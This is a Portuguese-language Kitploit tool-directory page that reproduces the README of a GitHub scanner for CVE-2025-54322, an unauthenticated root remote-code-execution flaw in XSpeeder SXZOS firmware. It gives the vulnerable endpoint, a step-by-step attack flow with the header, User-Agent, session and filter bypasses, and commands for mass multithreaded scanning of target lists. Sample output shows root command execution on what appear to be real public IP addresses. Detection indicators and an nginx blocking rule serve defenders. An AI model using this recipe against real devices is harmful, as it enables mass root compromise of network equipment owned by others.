Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-54322 — CVE-2025-54322 - Localizador Rápido de RCE 0day Pré-Autenticação XSpeeder SXZOS | Kitploit
Ferramentas/GitHubGitHub/sachinart/cve-2025-54322
ReconhecimentoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubsachinart/cve-2025-54322

CVE-2025-54322

CVE-2025-54322 - Localizador Rápido de RCE 0day Pré-Autenticação XSpeeder SXZOS

Ver Repositório
821há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-54322 - Scanner de RCE Pré-Autenticação XSpeeder SXZOS

License Python CVE

Um scanner de vulnerabilidade multi-thread para CVE-2025-54322, uma vulnerabilidade de execução remota de código não autenticada no firmware XSpeeder SXZOS afetando ~70.000+ hosts globalmente.

📋 Índice

  • Sobre a Vulnerabilidade
  • Funcionalidades
  • Instalação
  • Uso
  • Saída
  • Aviso Legal
  • Créditos
  • Autor

🔍 Sobre a Vulnerabilidade

CVE-2025-54322 é uma vulnerabilidade crítica de execução remota de código pré-autenticação descoberta no firmware XSpeeder SXZOS, que alimenta dispositivos SD-WAN, roteadores e equipamentos de borda de rede.

Detalhes da Vulnerabilidade

Detalhes Técnicos

A vulnerabilidade existe na interface web baseada em Django do firmware SXZOS:

  1. Endpoint Vulnerável: /?title=ABC&oIp=XXX&chkid=[payload_base64]
  2. Causa Raiz: Uso inseguro da função eval() do Python em entrada de usuário decodificada em base64
  3. Autenticação: Nenhuma necessária (pré-autenticação)
  4. Contexto de Execução: Privilégios root
  5. Hosts Afetados: ~70.000+ dispositivos globalmente acessíveis publicamente

Fluxo de Ataque

root@kitploit:~
1. Calcular nonce baseado em tempo para o cabeçalho X-SXZ-R
2. Aquecer sessão via endpoint /webInfos/
3. Criar payload malicioso com string de bypass (#sUserCodexsPwd)
4. Codificar payload em base64
5. Enviar exploit com exatamente 3 parâmetros de consulta
6. Servidor decodifica e avalia o payload
7. Comandos executados com privilégios root

Mecanismos de Bypass

O exploit contorna múltiplas camadas de defesa:

  • Verificação de User-Agent do Nginx: Spoofado com SXZ/2.3
  • Nonce Baseado em Tempo: Cabeçalho calculado X-SXZ-R: [0-6]
  • Exigência de Sessão: Aquecida via /webInfos/
  • Filtro de String: Contornado com comentário #sUserCodexsPwd
  • Contagem de Parâmetros: Mantém exatamente 3 parâmetros de consulta

✨ Funcionalidades

  • ✅ Escaneamento multi-thread - Teste concorrente de múltiplos alvos
  • ✅ Bypass SSL - Lida com certificados autoassinados e inválidos
  • ✅ Lógica de retentativa inteligente - 2 tentativas por alvo
  • ✅ Saída limpa - Mostra apenas hosts vulneráveis
  • ✅ Escrita em arquivo em tempo real - Salva resultados em vuln-confirm.txt imediatamente
  • ✅ Acompanhamento de progresso - Atualizações ao vivo a cada 50 hosts
  • ✅ Operações thread-safe - Operações seguras de arquivo e console concorrentes
  • ✅ Detecção precisa - Validação baseada em regex da execução de comandos
  • ✅ Lógica compatível com PoC - Segue a metodologia original do exploit

🚀 Instalação

Pré-requisitos

  • Python 3.7 ou superior
  • Gerenciador de pacotes pip

Configuração

root@kitploit:~
# Clone o repositório
git clone https://github.com/Sachinart/CVE-2025-54322.git
cd CVE-2025-54322

# Instale as dependências necessárias
pip install -r requirements.txt

Dependências

Crie um arquivo requirements.txt:

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0

📖 Uso

Uso Básico

root@kitploit:~
python3 scanner.py targets.txt

Uso Avançado

root@kitploit:~
# Escanear com número personalizado de threads (padrão: 10)
python3 scanner.py targets.txt 20

# Escanear com o máximo de threads para resultados mais rápidos
python3 scanner.py targets.txt 50

# Escanear com número conservador de threads
python3 scanner.py targets.txt 5

Formato do Arquivo de Alvos

Crie um arquivo targets.txt com um alvo por linha:

root@kitploit:~
https://192.168.1.100:4433
https://10.0.0.50:8443
https://example.com:4433
http://vulnerable-device.local

Exemplo de Sessão

root@kitploit:~
$ python3 scanner.py targets.txt 20

╔═══════════════════════════════════════════════════════════════╗
║     XSpeeder SXZOS (CVE-2025-54322) RCE Scanner              ║
║     Pre-Auth Root RCE Vulnerability Checker                   ║
║     Showing: VULNERABLE HOSTS ONLY                            ║
╚═══════════════════════════════════════════════════════════════╝

[*] Loaded 2338 targets from targets.txt
[*] Using 20 concurrent threads
[*] Vulnerable hosts will be saved to: vuln-confirm.txt
[*] Starting scan...

======================================================================
[+] VULNERABLE: https://27.40.80.93:4433
[+] Status: VULNERABLE - RCE Confirmed
[+] HTTP Status: 500
[+] Output: uid=0(root) gid=0(root)
======================================================================

[*] Progress: 50/2338 | Found: 12 vulnerable
[*] Progress: 100/2338 | Found: 24 vulnerable

======================================================================
[*] SCAN COMPLETE
======================================================================
[*] Total Time: 890.45 seconds
[*] Total Targets Scanned: 2338
[*] Vulnerable Hosts Found: 156
[*] Success Rate: 6.67%
======================================================================

📊 Saída

Saída no Console

O scanner exibe:

  • Descobertas em tempo real de hosts vulneráveis
  • Atualizações de progresso a cada 50 hosts
  • Resumo final com estatísticas
  • Resultados limpos e organizados

Saída em Arquivo (vuln-confirm.txt)

root@kitploit:~
XSpeeder SXZOS CVE-2025-54322 - Vulnerable Hosts
Scan started: 2025-12-27 15:30:45
======================================================================

https://27.40.80.93:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
https://27.40.83.189:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------

======================================================================
Scan completed: 2025-12-27 15:45:30
Total scanned: 2338
Vulnerable: 156
Time taken: 890.45 seconds

🎯 Recomendações de Threads

⚠️ Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizado.

Aviso Legal

  • Teste apenas sistemas que você possui ou para os quais tenha permissão explícita por escrito
  • O acesso não autorizado a sistemas de computador é ilegal na maioria das jurisdições
  • O autor não assume responsabilidade pelo uso indevido desta ferramenta
  • Ao usar esta ferramenta, você concorda em usá-la de forma responsável e ética
  • Esta ferramenta é apenas para pesquisa de segurança e teste de penetração

Divulgação Responsável

Se você descobrir sistemas vulneráveis:

  1. Não explore além de confirmar a vulnerabilidade
  2. Reporte as descobertas ao proprietário do sistema imediatamente
  3. Permita tempo razoável para correção
  4. Não divulgue publicamente hosts vulneráveis específicos

Uso Ético

  • FAÇA: Use para teste de penetração autorizado
  • FAÇA: Use para pesquisa de segurança com permissão
  • FAÇA: Reporte vulnerabilidades de forma responsável
  • NÃO FAÇA: Use para acesso não autorizado
  • NÃO FAÇA: Use para fins maliciosos
  • NÃO FAÇA: Exponha publicamente sistemas vulneráveis

🛡️ Mitigação

Para Administradores de Sistema

Se você gerencia dispositivos XSpeeder SXZOS:

  1. Isole imediatamente os dispositivos afetados da internet pública
  2. Implemente segmentação de rede para limitar exposição
  3. Implante regras de WAF para bloquear tentativas de exploração
  4. Monitore logs em busca de indicadores de comprometimento
  5. Entre em contato com a XSpeeder para atualizações de firmware (fornecedor não respondeu até a publicação)
  6. Considere soluções alternativas se o fornecedor permanecer sem resposta

Detecção

Procure por estes indicadores nos logs:

  • Requisições a /?title=*&oIp=*&chkid=* com payloads base64
  • User-Agent: SXZ/2.3
  • Cabeçalhos X-SXZ-R incomuns
  • Strings base64 contendo #sUserCodexsPwd
  • Múltiplas requisições a /webInfos/ seguidas do caminho raiz

Soluções Temporárias

root@kitploit:~
# Regra Nginx para bloquear tentativas de exploração
location / {
    if ($args ~* "chkid=") {
        return 403;
    }
}

📚 Referências

  • Divulgação Original: pwn.ai - CVE-2025-54322 Zero-Day
  • Entrada NVD: CVE-2025-54322 (pendente)
  • Fornecedor: XSpeeder (sem resposta após mais de 7 meses)

🙏 Créditos

Descoberta Original da Vulnerabilidade

Esta vulnerabilidade foi descoberta autonomamente por pwn.ai - uma plataforma de pesquisa de segurança alimentada por IA.

  • Plataforma de Descoberta: pwn.ai
  • Divulgação Original: Postagem do Blog pwn.ai
  • Data da Descoberta: Descoberta por agentes pwn.ai mais de 10 meses antes da publicação
  • Cronograma de Divulgação: Mais de 7 meses de contato com o fornecedor sem resposta

Nota Importante: Esta é a primeira vulnerabilidade RCE zero-day de exploração remota descoberta por agentes publicamente documentada.

👨‍💻 Autor

Chirag Artani

  • 🌐 Site: https://3rag.com
  • 🔐 Pesquisador de Segurança e Penetration Tester

Sobre o Scanner

Esta implementação de scanner foi criada para auxiliar profissionais de segurança a:

  • Identificar dispositivos XSpeeder SXZOS vulneráveis em suas redes
  • Conduzir testes de penetração autorizados
  • Validar a eficácia da implantação de patches
  • Realizar pesquisa de segurança e conscientização

📄 Licença

Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE para detalhes.

🤝 Contribuição

Contribuições são bem-vindas! Sinta-se à vontade para enviar um Pull Request.

Diretrizes

  1. Siga as diretrizes de estilo PEP 8
  2. Adicione comentários para lógica complexa
  3. Teste minuciosamente antes de enviar
  4. Atualize a documentação conforme necessário
  5. Garanta apenas casos de uso ético

📞 Suporte

Para perguntas, problemas ou sugestões:

  • Abra uma issue no GitHub
  • Visite https://3rag.com
  • Siga práticas de divulgação responsável

Lembre-se: Com grandes poderes vêm grandes responsabilidades. Use esta ferramenta de forma ética e legal.

Mantenha-se Seguro. Mantenha-se Ético. Mantenha-se Legal.

Baixar ferramenta
CampoValor
ID CVECVE-2025-54322
FornecedorXSpeeder (fornecedor chinês de rede)
Produto AfetadoFirmware SXZOS
Tipo de VulnerabilidadeExecução Remota de Código Pré-Autenticação (RCE)
Pontuação CVSS9.8+ (Crítico)
Vetor de AtaqueRede
Privilégios NecessáriosNenhum
Interação do UsuárioNenhum
ImpactoComprometimento total do sistema com privilégios root
Quantidade de AlvosThreads RecomendadasTempo Esperado
1-105 threads~1-2 min
10-5010 threads~3-5 min
50-10020 threads~5-10 min
100-50030 threads~10-20 min
500+40-50 threads~20+ min